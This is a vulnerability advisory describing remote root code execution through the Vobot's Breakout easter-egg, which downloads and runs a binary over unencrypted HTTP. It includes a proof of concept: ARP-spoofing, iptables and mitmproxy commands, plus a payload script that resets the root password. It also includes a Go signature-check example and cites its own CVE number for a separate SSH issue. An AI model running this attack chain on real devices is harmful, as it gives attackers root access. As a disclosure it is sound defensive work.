CVE-2018-6826 Remote code execution via easter-egg

6. February 2018 - Thomas Roth - thomas.roth@leveldown.de

Products affected

Severity

CVSS: 9.6 Critical

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.

Description

It was found that the Vobot firmware has an easter-egg that starts a Breakout video game, which can be invoked by pressing the volume-down button on the back of the device for about 3 seconds. The shell script that implements this easter-egg (located in /usr/sbin/game_breakout) uses the wget utility to download the game from the URL http://file.myvobot.com/plugin/game/breakout to /tmp/breakout and executes it.

An attacker that conducts a man-in-the-middle attack can intercept the HTTP request and supply his own binary which is then executed with root permissions on the device.

Mitigation

The connection should at least use HTTPS (with certificate validation, see the CVE-2018-6827 vulnerability report). This solution will still pose an issue if the server (or the TLS connection) is compromised, as no additional validation of the binary is done (e.g. a signature verification). It is therefore recommended to perform additional, digital-signature-based verification of all downloaded executables and firmware upgrades before they are executed.
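As an added illustration of the recommended mitigation (not the Vobot's firmware code), the following Go program shows a fetch-and-run step that refuses to stage a downloaded payload unless a detached Ed25519 signature verifies against a pinned publisher key. The signature scheme, the key pair and the sample payload are assumptions constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"errors"
	"fmt"
	"os"
	"path/filepath"
)

// ErrBadSignature is returned when the downloaded payload does not verify
// against the pinned publisher key; such a payload must never be executed.
var ErrBadSignature = errors.New("payload signature verification failed")

// VerifyPayload checks a detached Ed25519 signature over the downloaded bytes.
// A real device would keep the vendor public key in read-only firmware storage;
// here it is passed in explicitly.
func VerifyPayload(pub ed25519.PublicKey, payload, sig []byte) error {
	if len(pub) != ed25519.PublicKeySize || len(sig) != ed25519.SignatureSize {
		return ErrBadSignature
	}
	if !ed25519.Verify(pub, payload, sig) {
		return ErrBadSignature
	}
	return nil
}

// StageVerifiedPayload is the hardened replacement for "wget ... && execute":
// nothing is written to disk unless the signature verifies, so a tampered
// HTTP response (e.g. from a man-in-the-middle) never reaches the run step.
func StageVerifiedPayload(pub ed25519.PublicKey, payload, sig []byte, dir string) (string, error) {
	if err := VerifyPayload(pub, payload, sig); err != nil {
		return "", err
	}
	path := filepath.Join(dir, "breakout") // assumed file name, as in /tmp/breakout
	if err := os.WriteFile(path, payload, 0o700); err != nil {
		return "", err
	}
	return path, nil
}

func main() {
	// Constructed demo: throwaway key pair, a genuine payload, then a tampered copy.
	pub, priv, _ := ed25519.GenerateKey(nil)
	payload := []byte("#!/bin/sh\necho breakout\n")
	sig := ed25519.Sign(priv, payload)
	fmt.Println("genuine payload:", VerifyPayload(pub, payload, sig))
	tampered := []byte("#!/bin/sh\necho tampered\n")
	fmt.Println("tampered payload:", VerifyPayload(pub, tampered, sig))
}
```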

Example/Proof of concept

An attacker on the same network can conduct a man-in-the-middle attack using ARP spoofing. By then using a transparent proxy such as mitmproxy it is possible to intercept and modify all requests between the Vobot client and the different servers.

The attacker can then replace the response of the HTTP request to http://file.myvobot.com/plugin/game/breakout with a custom response, such as:

#!/bin/sh
passwd << EOF
test1234
test1234
EOF

This will set the root password of the device to test1234 which can be used by a network-local attacker to connect to the device using SSH (which is enabled by default, see CVE-2018-6826).

Example attack setup:

export VOBOT_IP=...   # e.g. 192.168.0.5
export GATEWAY_IP=... # e.g. 192.168.0.1
export INTERFACE=...  # e.g. wlan0
# Forward the victim's traffic and redirect HTTP/HTTPS to the local proxy port
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 443 -j REDIRECT --to-port 8080

# In separate terminals:
arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null &
mitmproxy -T --host   # transparent mode (flag syntax of the mitmproxy version used at the time)

Disclosure timeline